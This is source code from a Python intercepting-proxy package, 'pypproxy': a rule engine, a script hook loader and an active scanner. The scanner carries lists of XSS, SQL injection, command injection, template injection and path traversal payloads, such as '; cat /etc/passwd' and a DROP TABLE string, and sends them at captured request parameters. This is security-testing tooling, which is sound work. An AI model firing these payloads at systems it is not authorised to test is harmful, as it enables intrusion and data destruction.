pypproxy 0.1.0__py3-none-any.whl

pypproxy/rule/rule.py

@@ -0,0 +1,198 @@
+from __future__ import annotations
+
+import re
+from dataclasses import dataclass, field
+from enum import StrEnum
+
+
+class Action(StrEnum):
+    PASSTHROUGH = "passthrough"
+    MODIFY = "modify"
+    BLOCK = "block"
+    REDIRECT = "redirect"
+
+
+class MatchField(StrEnum):
+    HOST = "host"
+    PATH = "path"
+    METHOD = "method"
+    HEADER = "header"
+    BODY = "body"
+
+
+@dataclass
+class Condition:
+    field: MatchField
+    op: str  # equals, contains, prefix, regex
+    value: str
+    negate: bool = False
+    _compiled: re.Pattern | None = field(default=None, init=False, repr=False)
+
+    def matches(self, ctx: MatchContext) -> bool:
+        val = self._extract(ctx)
+        result = self._apply_op(val)
+        return not result if self.negate else result
+
+    def _extract(self, ctx: MatchContext) -> str:
+        if self.field == MatchField.HOST:
+            return ctx.host
+        if self.field == MatchField.PATH:
+            return ctx.path
+        if self.field == MatchField.METHOD:
+            return ctx.method
+        if self.field == MatchField.BODY:
+            return ctx.body.decode(errors="replace")
+        if self.field == MatchField.HEADER:
+            name = (
+                self.value.split(":")[0].strip().lower()
+                if ":" in self.value
+                else self.value.lower()
+            )
+            for k, vs in ctx.headers.items():
+                if k.lower() == name:
+                    return ", ".join(vs)
+        return ""
+
+    def _apply_op(self, val: str) -> bool:
+        if self.op == "equals":
+            return val == self.value
+        if self.op == "contains":
+            return self.value in val
+        if self.op == "prefix":
+            return val.startswith(self.value)
+        if self.op == "regex":
+            if self._compiled is None:
+                self._compiled = re.compile(self.value)
+            return bool(self._compiled.search(val))
+        return self.value in val
+
+
+@dataclass
+class Modification:
+    target: str  # req_header, resp_header, req_body, resp_body
+    operation: str  # set, delete, append, replace, find_replace
+    key: str = ""
+    value: str = ""
+    find: str = ""
+    replace: str = ""
+
+
+@dataclass
+class Rule:
+    id: int = 0
+    name: str = ""
+    enabled: bool = True
+    priority: int = 0
+    conditions: list[Condition] = field(default_factory=list)
+    action: Action = Action.PASSTHROUGH
+    modifications: list[Modification] = field(default_factory=list)
+    redirect_url: str = ""
+
+    def matches(self, ctx: MatchContext) -> bool:
+        return all(c.matches(ctx) for c in self.conditions)
+
+    def to_dict(self) -> dict:
+        return {
+            "id": self.id,
+            "name": self.name,
+            "enabled": self.enabled,
+            "priority": self.priority,
+            "conditions": [
+                {
+                    "field": c.field.value,
+                    "op": c.op,
+                    "value": c.value,
+                    "negate": c.negate,
+                }
+                for c in self.conditions
+            ],
+            "action": self.action.value,
+            "modifications": [
+                {
+                    "target": m.target,
+                    "operation": m.operation,
+                    "key": m.key,
+                    "value": m.value,
+                    "find": m.find,
+                    "replace": m.replace,
+                }
+                for m in self.modifications
+            ],
+            "redirect_url": self.redirect_url,
+        }
+
+    @classmethod
+    def from_dict(cls, data: dict) -> Rule:
+        rule = cls(
+            id=data.get("id", 0),
+            name=data.get("name", ""),
+            enabled=data.get("enabled", True),
+            priority=data.get("priority", 0),
+            action=Action(data.get("action", "passthrough")),
+            redirect_url=data.get("redirect_url", ""),
+        )
+        for c in data.get("conditions", []):
+            rule.conditions.append(
+                Condition(
+                    field=MatchField(c["field"]),
+                    op=c.get("op", "contains"),
+                    value=c.get("value", ""),
+                    negate=c.get("negate", False),
+                )
+            )
+        for m in data.get("modifications", []):
+            rule.modifications.append(
+                Modification(
+                    target=m["target"],
+                    operation=m.get("operation", "set"),
+                    key=m.get("key", ""),
+                    value=m.get("value", ""),
+                    find=m.get("find", ""),
+                    replace=m.get("replace", ""),
+                )
+            )
+        return rule
+
+
+@dataclass
+class MatchContext:
+    method: str
+    host: str
+    path: str
+    headers: dict[str, list[str]]
+    body: bytes
+
+
+class RuleManager:
+    def __init__(self) -> None:
+        self._rules: list[Rule] = []
+        self._counter = 0
+
+    def add(self, rule: Rule) -> Rule:
+        self._counter += 1
+        rule.id = self._counter
+        self._rules.append(rule)
+        self._sort()
+        return rule
+
+    def update(self, rule: Rule) -> None:
+        for i, r in enumerate(self._rules):
+            if r.id == rule.id:
+                self._rules[i] = rule
+                self._sort()
+                return
+
+    def delete(self, rule_id: int) -> None:
+        self._rules = [r for r in self._rules if r.id != rule_id]
+
+    def list(self) -> list[Rule]:
+        return list(self._rules)
+
+    def match(self, ctx: MatchContext) -> Rule | None:
+        for rule in self._rules:
+            if rule.enabled and rule.matches(ctx):
+                return rule
+        return None
+
+    def _sort(self) -> None:
+        self._rules.sort(key=lambda r: r.priority, reverse=True)

pypproxy/scan/scanner.py

@@ -0,0 +1,296 @@
+from __future__ import annotations
+
+import asyncio
+import json
+import re
+import time
+from dataclasses import dataclass
+from typing import Any
+from urllib.parse import parse_qs, urlencode
+
+import httpx
+
+from pypproxy.store.models import Entry
+
+# ---- Payload lists ----
+
+XSS_PAYLOADS = [
+    "<script>alert(1)</script>",
+    '"><script>alert(1)</script>',
+    "';alert(1)//",
+    "<img src=x onerror=alert(1)>",
+    "<svg onload=alert(1)>",
+    "javascript:alert(1)",
+    '"><img src=x onerror=alert`1`>',
+    "${alert(1)}",
+    "{{7*7}}",  # SSTI probe
+    "#{7*7}",
+]
+
+SQLI_PAYLOADS = [
+    "'",
+    "''",
+    "' OR '1'='1",
+    "' OR '1'='1'--",
+    "1' OR '1'='1",
+    "1 OR 1=1",
+    "1; DROP TABLE users--",
+    "' UNION SELECT NULL--",
+    "' AND 1=2 UNION SELECT NULL,NULL--",
+    "admin'--",
+    "' OR 1=1#",
+    "1' AND SLEEP(2)--",  # time-based blind
+]
+
+CMDI_PAYLOADS = [
+    "; ls",
+    "| ls",
+    "&& ls",
+    "|| ls",
+    "; cat /etc/passwd",
+    "$(id)",
+    "`id`",
+    "; ping -c 1 127.0.0.1",
+    "| whoami",
+]
+
+SSTI_PAYLOADS = [
+    "{{7*7}}",
+    "${7*7}",
+    "#{7*7}",
+    "<%= 7*7 %>",
+    "{{config}}",
+    "{{''.__class__.__mro__}}",
+]
+
+PATH_TRAVERSAL_PAYLOADS = [
+    "../../etc/passwd",
+    "../../../etc/passwd",
+    "..\\..\\windows\\system32\\drivers\\etc\\hosts",
+    "....//....//etc/passwd",
+    "%2e%2e%2f%2e%2e%2fetc%2fpasswd",
+]
+
+ALL_PAYLOADS: dict[str, list[str]] = {
+    "xss": XSS_PAYLOADS,
+    "sqli": SQLI_PAYLOADS,
+    "cmdi": CMDI_PAYLOADS,
+    "ssti": SSTI_PAYLOADS,
+    "path_traversal": PATH_TRAVERSAL_PAYLOADS,
+}
+
+
+@dataclass
+class ScanResult:
+    param: str
+    category: str
+    payload: str
+    status_code: int = 0
+    response_body: bytes = b""
+    duration_ms: int = 0
+    error: str = ""
+    suspicious: bool = False
+    reason: str = ""
+
+    def to_dict(self) -> dict:
+        import base64
+
+        return {
+            "param": self.param,
+            "category": self.category,
+            "payload": self.payload,
+            "status_code": self.status_code,
+            "response_body": base64.b64encode(self.response_body).decode()
+            if self.response_body
+            else "",
+            "duration_ms": self.duration_ms,
+            "error": self.error,
+            "suspicious": self.suspicious,
+            "reason": self.reason,
+        }
+
+
+def _extract_params(entry: Entry) -> dict[str, str]:
+    """Extract injectable parameters from query string and JSON body."""
+    params: dict[str, str] = {}
+
+    if entry.query:
+        for k, vs in parse_qs(entry.query).items():
+            params[f"query:{k}"] = vs[0] if vs else ""
+
+    if entry.req_body:
+        try:
+            data = json.loads(entry.req_body.decode("utf-8", errors="replace"))
+            _collect_strings(data, "", params)
+        except Exception:
+            pass
+
+    return params
+
+
+def _collect_strings(obj: Any, prefix: str, out: dict[str, str]) -> None:
+    if isinstance(obj, dict):
+        for k, v in obj.items():
+            _collect_strings(v, f"body:{prefix}{k}", out)
+    elif isinstance(obj, list):
+        for i, v in enumerate(obj):
+            _collect_strings(v, f"{prefix}[{i}].", out)
+    elif isinstance(obj, str):
+        out[prefix.rstrip(".")] = obj
+
+
+def _apply_payload(entry: Entry, param_key: str, payload: str) -> tuple[str, bytes]:
+    """Apply payload to the appropriate parameter. Returns (url, body)."""
+    url = f"{entry.scheme}://{entry.host}{entry.path}"
+    body = entry.req_body
+
+    if param_key.startswith("query:"):
+        key = param_key.removeprefix("query:")
+        qs = parse_qs(entry.query)
+        qs[key] = [payload]
+        url += "?" + urlencode(qs, doseq=True)
+    elif param_key.startswith("body:"):
+        key_path = param_key.removeprefix("body:")
+        try:
+            data = json.loads(body.decode("utf-8", errors="replace"))
+            _set_nested(data, key_path, payload)
+            body = json.dumps(data).encode()
+        except Exception:
+            pass
+        if entry.query:
+            url += "?" + entry.query
+    else:
+        if entry.query:
+            url += "?" + entry.query
+
+    return url, body
+
+
+def _set_nested(obj: Any, key_path: str, value: Any) -> None:
+    parts = re.split(r"[.\[\]]", key_path)
+    parts = [p for p in parts if p]
+    for part in parts[:-1]:
+        if isinstance(obj, dict):
+            obj = obj.get(part, {})
+        elif isinstance(obj, list):
+            try:
+                obj = obj[int(part)]
+            except (ValueError, IndexError):
+                return
+    if parts:
+        last = parts[-1]
+        if isinstance(obj, dict):
+            obj[last] = value
+
+
+def _is_suspicious(resp_body: bytes, payload: str, category: str, status: int) -> tuple[bool, str]:
+    """Heuristic check for vulnerability indicators."""
+    text = resp_body.decode("utf-8", errors="replace").lower()
+
+    if category == "xss" and payload.lower() in text:
+        return True, "Payload reflected in response"
+
+    if category == "sqli":
+        sql_errors = [
+            "sql syntax",
+            "mysql",
+            "sqlite",
+            "ora-",
+            "postgresql",
+            "odbc",
+            "jdbc",
+            "syntax error",
+            "unclosed quotation",
+            "you have an error in your sql",
+        ]
+        for err in sql_errors:
+            if err in text:
+                return True, f"SQL error signature: '{err}'"
+        if payload == "1' AND SLEEP(2)--":
+            return False, ""  # time-based handled separately
+
+    if category == "cmdi":
+        cmdi_indicators = ["root:", "uid=", "bin/", "directory of", "volume serial"]
+        for ind in cmdi_indicators:
+            if ind in text:
+                return True, f"Command output indicator: '{ind}'"
+
+    if category == "ssti":
+        if "49" in text and "{{7*7}}" in payload:
+            return True, "SSTI: 7*7=49 reflected"
+        if "49" in text and "${7*7}" in payload:
+            return True, "SSTI: 7*7=49 reflected"
+
+    if category == "path_traversal":
+        pt_indicators = ["root:x:", "[boot loader]", "for 1 file"]
+        for ind in pt_indicators:
+            if ind in text:
+                return True, f"File content indicator: '{ind}'"
+
+    if status == 500:
+        return True, "Server error (500) — possible injection point"
+
+    return False, ""
+
+
+async def run_scan(
+    entry: Entry,
+    categories: list[str] | None = None,
+    concurrency: int = 5,
+    timeout: int = 15,
+) -> list[ScanResult]:
+    """Run active scan on the entry. Returns list of findings."""
+    if categories is None:
+        categories = list(ALL_PAYLOADS.keys())
+
+    params = _extract_params(entry)
+    if not params:
+        return []
+
+    sem = asyncio.Semaphore(concurrency)
+    req_headers = {k: ", ".join(v) for k, v in entry.req_headers.items()}
+    tasks = []
+
+    for param_key in params:
+        for cat in categories:
+            if cat not in ALL_PAYLOADS:
+                continue
+            for payload in ALL_PAYLOADS[cat]:
+                tasks.append((param_key, cat, payload))
+
+    async def _test(param_key: str, cat: str, payload: str) -> ScanResult:
+        async with sem:
+            url, body = _apply_payload(entry, param_key, payload)
+            start = time.monotonic()
+            try:
+                async with httpx.AsyncClient(verify=False, timeout=timeout, http2=True) as client:
+                    resp = await client.request(
+                        method=entry.method,
+                        url=url,
+                        headers=req_headers,
+                        content=body,
+                    )
+                status = resp.status_code
+                resp_body = resp.content[:1024]
+                error = ""
+            except Exception as e:
+                status = 0
+                resp_body = b""
+                error = str(e)
+
+            dur = int((time.monotonic() - start) * 1000)
+            suspicious, reason = _is_suspicious(resp_body, payload, cat, status)
+            return ScanResult(
+                param=param_key,
+                category=cat,
+                payload=payload,
+                status_code=status,
+                response_body=resp_body,
+                duration_ms=dur,
+                error=error,
+                suspicious=suspicious,
+                reason=reason,
+            )
+
+    gathered = await asyncio.gather(*[_test(p, c, pl) for p, c, pl in tasks])
+    return list(gathered)

pypproxy/script/engine.py

@@ -0,0 +1,49 @@
+from __future__ import annotations
+
+import importlib.util
+from pathlib import Path
+
+
+class ScriptEngine:
+    """
+    Loads a Python script and calls on_request / on_response hooks if defined.
+    The script runs in its own module namespace.
+    """
+
+    def __init__(self) -> None:
+        self._module = None
+
+    def load_file(self, path: str) -> None:
+        p = Path(path).resolve()
+        spec = importlib.util.spec_from_file_location("paxy_script", p)
+        if spec is None or spec.loader is None:
+            raise ImportError(f"Cannot load script: {path}")
+        mod = importlib.util.module_from_spec(spec)
+        spec.loader.exec_module(mod)  # type: ignore[union-attr]
+        self._module = mod
+
+    def on_request(self, method: str, host: str, path: str, body: bytes) -> bytes:
+        if self._module is None:
+            return body
+        fn = getattr(self._module, "on_request", None)
+        if fn is None:
+            return body
+        result = fn(method, host, path, body)
+        if isinstance(result, bytes | bytearray):
+            return bytes(result)
+        if isinstance(result, str):
+            return result.encode()
+        return body
+
+    def on_response(self, status: int, body: bytes) -> bytes:
+        if self._module is None:
+            return body
+        fn = getattr(self._module, "on_response", None)
+        if fn is None:
+            return body
+        result = fn(status, body)
+        if isinstance(result, bytes | bytearray):
+            return bytes(result)
+        if isinstance(result, str):
+            return result.encode()
+        return body